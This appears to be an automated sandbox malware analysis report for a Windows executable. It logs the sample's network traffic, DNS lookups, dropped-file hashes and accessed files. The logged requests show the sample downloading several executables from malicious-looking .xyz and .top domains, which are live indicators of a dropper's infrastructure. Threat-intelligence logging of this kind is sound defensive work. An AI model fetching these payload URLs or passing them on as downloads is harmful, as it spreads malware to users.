SHA256:
1bceb4e84115eabb8bf3df704b5cc014834ca08b126451ae95d60a968e66d666
Date Analysed:
Mar 29, 2021
File type:
Win32 executable
Version:
4.0.3
Environment:
Windows 7 64-bit Operating System
Network
HTTP conversation
[POST] http://192.168.23.15/6d2b15b9-58b9-4f34-8fe2-293b6beb3594/
Request Header
Content-Length: 733
POST /6d2b15b9-58b9-4f34-8fe2-293b6beb3594/ HTTP/1.1
Host: 192.168.23.15:5357
User-Agent: WSDAPI
Connection: Close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/soap+xml
Status
200
Response body filetype
text/xml
Response Header
Content-Length: 2208
HTTP/1.1 200
Server: Microsoft-HTTPAPI/2.0
Connection: close
Date: Mon, 29 Mar 2021 10:05:31 GMT
Content-Type: application/soap+xml
[GET] http://t1.cloudshielding.xyz/tasks
Request Header
GET /tasks HTTP/1.1
Host: t1.cloudshielding.xyz
Accept: */*
User-Agent: prun
Status
200
Response body filetype
text/plain
Response Header
Content-Length: 1248
HTTP/1.1 200 OK
Vary: Origin
Server: nginx/1.14.0 (Ubuntu)
Connection: keep-alive
Date: Mon, 29 Mar 2021 10:05:25 GMT
Content-Type: text/plain; charset=utf-8
[GET] http://fetch.nerdprotect.xyz/p3.exe
Request Header
GET /p3.exe HTTP/1.1
Host: fetch.nerdprotect.xyz
Accept: */*
Status
200
Response body filetype
application/x-dosexec
Response Header
Content-Length: 1727355
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Last-Modified: Mon, 29 Mar 2021 10:00:03 GMT
Connection: keep-alive
ETag: "6061a523-1a5b7b"
Date: Mon, 29 Mar 2021 10:05:26 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
[POST] http://192.168.23.18/6d2b15b9-58b9-4f34-8fe2-293b6beb3594/
Request Header
Content-Length: 733
POST /6d2b15b9-58b9-4f34-8fe2-293b6beb3594/ HTTP/1.1
Host: 192.168.23.18:5357
User-Agent: WSDAPI
Connection: Close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/soap+xml
Status
200
Response body filetype
text/xml
Response Header
Content-Length: 2208
HTTP/1.1 200
Server: Microsoft-HTTPAPI/2.0
Connection: close
Date: Mon, 29 Mar 2021 10:07:58 GMT
Content-Type: application/soap+xml
[GET] http://g.capboost.xyz/jhuimme.exe
Request Header
GET /jhuimme.exe HTTP/1.1
Host: g.capboost.xyz
Accept: */*
Status
200
Response body filetype
application/x-dosexec
Response Header
Content-Length: 998400
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Last-Modified: Thu, 25 Mar 2021 02:10:02 GMT
Connection: keep-alive
ETag: "605bf0fa-f3c00"
Date: Mon, 29 Mar 2021 10:04:50 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
[GET] http://shopfun.top/TT/Kara.exe
Request Header
Host: shopfun.top
GET /TT/Kara.exe HTTP/1.1
Accept: */*
Status
301
Response body filetype
text/html
Response Header
NEL: {"max_age":604800,"report_to":"cf-nel"}
Transfer-Encoding: chunked
Set-Cookie: __cfduid=dce2f0c437282eec385bfd2397bce8f9b1617012367; expires=Wed, 28-Apr-21 10:06:07 GMT; path=/; domain=.shopfun.top; HttpOnly; SameSite=Lax
CF-Cache-Status: DYNAMIC
cf-request-id: 091f0bb9820000dd7bbd283000000001
Server: cloudflare
Connection: keep-alive
location: https://shopfun.top/TT/Kara.exe
Date: Mon, 29 Mar 2021 10:06:08 GMT
HTTP/1.1 301 Moved Permanently
CF-RAY: 637848a26e1add7b-SIN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Content-Type: text/html; charset=iso-8859-1
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cJRJcp9UPlmLRJC%2FzSATXCCuk0IwGS0Io%2FaYttnoDOaJndkytQOle7ICwTuowtZPfDmwHqGHUZCG0%2FfGhGuP0%2F8LePwdpmwniWjRMg%3D%3D"}],"group":"cf-nel","max_age":604800}
[POST] http://192.168.23.16/587df1c9-7955-47ea-b3ad-16ef2a87b226/
Request Header
Content-Length: 733
POST /587df1c9-7955-47ea-b3ad-16ef2a87b226/ HTTP/1.1
Host: 192.168.23.16:5357
User-Agent: WSDAPI
Connection: Close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/soap+xml
Status
200
Response body filetype
text/xml
Response Header
Content-Length: 2208
HTTP/1.1 200
Server: Microsoft-HTTPAPI/2.0
Connection: close
Date: Mon, 29 Mar 2021 10:08:51 GMT
Content-Type: application/soap+xml
[POST] http://192.168.23.14/e38fe390-ee87-4bed-88b9-25ffbf33fdf9/
Request Header
Content-Length: 733
POST /e38fe390-ee87-4bed-88b9-25ffbf33fdf9/ HTTP/1.1
Host: 192.168.23.14:5357
User-Agent: WSDAPI
Connection: Close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/soap+xml
Status
200
Response body filetype
text/xml
Response Header
Content-Length: 2208
HTTP/1.1 200
Server: Microsoft-HTTPAPI/2.0
Connection: close
Date: Mon, 29 Mar 2021 10:05:28 GMT
Content-Type: application/soap+xml
[GET] http://159.89.171.243/1mb.dat
Request Header
GET /1mb.dat HTTP/1.1
Host: 159.89.171.243
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Status
200
Response body filetype
application/octet-stream
Response Header
Content-Length: 1048576
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Last-Modified: Sun, 15 Mar 2020 22:46:39 GMT
Connection: keep-alive
ETag: "5e6eb04f-100000"
Date: Mon, 29 Mar 2021 10:05:26 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
[GET] http://fetch.saleclutch.xyz/1.exe
Request Header
Host: fetch.saleclutch.xyz
Accept: */*
GET /1.exe HTTP/1.1
Status
200
Response body filetype
application/x-dosexec
Response Header
Content-Length: 324608
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Last-Modified: Mon, 29 Mar 2021 05:39:34 GMT
Connection: keep-alive
ETag: "60616816-4f400"
Date: Mon, 29 Mar 2021 10:04:44 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
[GET] http://www.msftncsi.com/ncsi.txt
Request Header
GET /ncsi.txt HTTP/1.1
Connection: Close
Host: www.msftncsi.com
User-Agent: Microsoft NCSI
Status
200
Response body filetype
text/plain
Response Header
Content-Length: 14
HTTP/1.1 200 OK
Connection: close
Cache-Control: max-age=30, must-revalidate
Date: Mon, 29 Mar 2021 10:05:39 GMT
Content-Type: text/plain
DNS Resolutions
t1.cloudshielding.xyz
["195.181.169.92", "195.181.169.92"]
fetch.nerdprotect.xyz
["195.181.169.92", "195.181.169.92"]
a1961.g2.akamai.net
["23.205.118.154", "23.205.118.16"]
time.microsoft.akadns.net
["40.81.94.65"]
proxy.netbounce.net
["195.181.164.195", "195.181.164.195"]
g.capboost.xyz
["195.181.169.92"]
m1.uptime66.com
["195.181.164.212", "195.181.164.212", "195.181.164.212"]
shopfun.top
["172.67.128.174", "104.21.2.38", "172.67.128.174", "104.21.2.38"]
www.msftncsi.com
[]
goQXflQiDKBwjCTFfnflSzU.goQXflQiDKBwjCTFfnflSzU
[]
fetch.saleclutch.xyz
["195.181.169.92"]
srv2.checkblanco.xyz
["195.181.169.92"]
teredo.ipv6.microsoft.com
[]
time.windows.com
[]
IP Traffic
UDP
239.255.255.250:3702
224.0.0.252:5355
224.0.0.251:5353
255.255.255.255:67
40.81.94.65:123
239.255.255.250:1900
255.255.255.255:68
TCP
195.181.164.195:9000
195.181.169.92:80
23.205.118.154:80
159.89.171.243:80
195.181.164.212:443
172.67.128.174:80
195.181.169.92:443
IGMP
224.0.0.22:0
224.0.0.1:0
Files Dropped
106c3cf938688e1d4e24480182d79ae969687e46d2b44d519f5b43dd90f9eecd
application/x-dosexec
6137f8db2192e638e13610f75e73b9247c05f4706f0afd1fdb132d86de6b4012
text/plain
64cb3cc325655ba7a7e955c6f6c39dd4ef2a237e6605dd4d11e63c5bc387edd9
text/xml
71e9538820b12b60ce88608c9f7da7072fc93836269d16a332fc196550ef6679
text/html
220e22217eda89a5f0fd7a39a7da2a8abc7f88eee8856c6540c8fe4e6dfd5928
text/xml
2f1d25b8a95247a563512983c3686346aa3e3911ff5da98a6eed799067a3dd62
text/xml
75220584fa1576a69af7ee4c9ec0e0ba2fab24e75b122be3086422f7cd3e3acb
application/x-dosexec
291cd644d26e99352bfdf5c87772859bf2c15c801ea4541a10d1ba3fb8690752
text/xml
036b02cc8e48e615e9c498b60f2505bf36db7afb5e5f057eab609aae4d0243ae
text/xml
2ceeca59ccd8705cf5c133fbc43d48eb17ee488d954f249196d051baedd62dc3
application/x-dosexec
05765e9a5cee5af6f5b1ca383427314bc82c4c5a2e8d3579db2bbfbe8542d3e4
text/plain
e3507a5019fad5b9f83252c492ad21f84f88523cc7650253a9ff7e15024296c5
text/xml
7298da0916328fffc3ccfc34982b56b4fe5853f7ca814f827b8c536bf4640304
text/xml
03f51bec889449243b6705a7c346183de64326cb8ddd52ccfc6e48a98a45ebab
application/x-dosexec
ja3
d0ee3237a14bbd89ca4d2b5356ab20ba
client_hello_pkt
1603010118010001140303a6ab65e50d308392634d067d6eeb4e994800d53f3011d3d73b4bd09265b80f1620a68277da8215ccbf28a7d7903ffbf54c64c9f7a66ff7ba4b2f5bb1911dedff900026c02fc030c02bc02ccca8cca9c013c009c014c00a009c009d002f0035c012000a130113031302010000a500000014001200000f6d312e757074696d6536362e636f6d000500050100000000000a000a0008001d001700180019000b00020100000d001a0018080404030807080508060401050106010503060302010203ff010001000010000e000c02683208687474702f312e3100120000002b0009080304030303020301003300260024001d0020ea9f95655678c8918c8aa394a512656b246f08dac2aca8f11c78361eed231117
destination_ip
195.181.164.212
httpsDomain
m1.uptime66.com
timestamp
1617012626.13
destination_port
443
ja3
771,49199-49200-49195-49196-52392-52393-49171-49161-49172-49162-156-157-47-53-49170-10-4865-4867-4866,0-5-10-11-13-65281-16-18-43-51,29-23-24-25,0
Process
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\MSIMG32.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\NTDLL.DLL
C:\WINDOWS\SYSWOW64\KERNEL32.DLL
C:\MALWARE\1BCEB4E84115EABB8BF3DF704B5CC014834CA08B126451AE95D60A968E66D666.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\ADVAPI32.DLL
C:\WINDOWS\SYSWOW64\WINMM.DLL
C:\WINDOWS\SYSWOW64\WS2_32.DLL
C:\WINDOWS\SYSWOW64\POWRPROF.DLL
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WSHTCPIP.DLL
C:\WINDOWS\SYSWOW64\EN-US\WSHTCPIP.DLL.MUI
C:\WINDOWS\SYSWOW64\WSHIP6.DLL
C:\WINDOWS\SYSWOW64\EN-US\WSHIP6.DLL.MUI
C:\WINDOWS\SYSWOW64\WSHQOS.DLL
C:\WINDOWS\SYSWOW64\EN-US\WSHQOS.DLL.MUI
C:\WINDOWS\SYSWOW64\CMD.EXE
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\SYSWOW64\EN-US\GAMEUX.DLL.MUI
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\94IYE447TS3OVIVOFHLI.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\JGRNUS9P3WSM6KU1PKW0.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFA784.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\PSKUL7GJMAB0ONUO017P.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFA7B3.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\8XSEURBKIJZ9I1OAGOAD.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFA811.TMP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\MCCJNPLYDM9988TJ2P7M.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFA83F.TMP
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\FYOMWUZS8SQ46UF07U26.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFAA90.TMP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\NDYVXIRAZ4AR0EDNYDHZ.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFABC8.TMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\YFUSY1A214O5F6MY47ER.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFAC07.TMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\BH8GG2G5KLF6CI9IF3JV.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFADDB.TMP
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\MSWSOCK.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\WINDOWS\SYSWOW64\DNSAPI.DLL
C:\WINDOWS\SYSWOW64\IPHLPAPI.DLL
C:\WINDOWS\SYSWOW64\WINNSI.DLL
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\TVJQ15YNJB5LU4FF3EIW.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFB643.TMP
C:\WINDOWS\SYSWOW64\RASADHLP.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\5EWXH2EKYNLALY8QH70N.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFBC3C.TMP
C:\WINDOWS\SYSWOW64\FWPUCLNT.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\NKPN2J4M4SBW90ICH9PK.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFBD26.TMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\KH0WBVPYPHJZ5WJ8Y4IX.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFBDD2.TMP
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
C:\WINDOWS\SYSWOW64\CRYPT32.DLL
